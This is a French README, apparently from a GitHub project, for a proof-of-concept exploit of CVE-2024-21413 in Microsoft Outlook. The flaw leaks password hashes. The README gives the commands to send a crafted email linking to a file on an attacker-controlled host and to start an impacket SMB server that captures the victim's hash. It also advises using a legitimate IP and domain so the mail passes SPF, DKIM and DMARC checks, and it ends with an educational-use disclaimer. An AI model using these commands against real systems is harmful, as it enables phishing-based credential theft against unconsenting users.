
Vulnérabilité de divulgation d'informations de Microsoft Outlook (fuite du hash de mot de passe) - CVE-2024-21413 POC
python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf
[!NOTE] r00tb1t : est le fichier de test partagé (document Word dans ce cas) depuis la machine de l'attaquant (xx.xx.xx.xx).
Pour garantir la conformité avec SPF, DKIM et DMARC, utilisez $IP et un domaine légitimes.
Assurez-vous d'installer la bibliothèque pexpect si ce n'est pas déjà fait avec
pip install pexpect.
impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp .
python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url example.com/path/to/shared/file/r0tb1t.rtf
- Kudooooos & détails sur CVE-2024-21413 .
- Contournement/Correctif :
[!CAUTION] ⚠️ Avertissement : IMPORTANT : Ce script est fourni uniquement à des fins éducatives, de tests éthiques et d'utilisation légale. Ne l'utilisez pas sur un système ou un réseau sans autorisation explicite. L'accès non autorisé aux systèmes informatiques et aux réseaux est illégal, et les utilisateurs pris en train d'effectuer des activités non autorisées s'exposent à des poursuites judiciaires. L'auteur n'est PAS responsable des dommages causés par une mauvaise utilisation de ce script..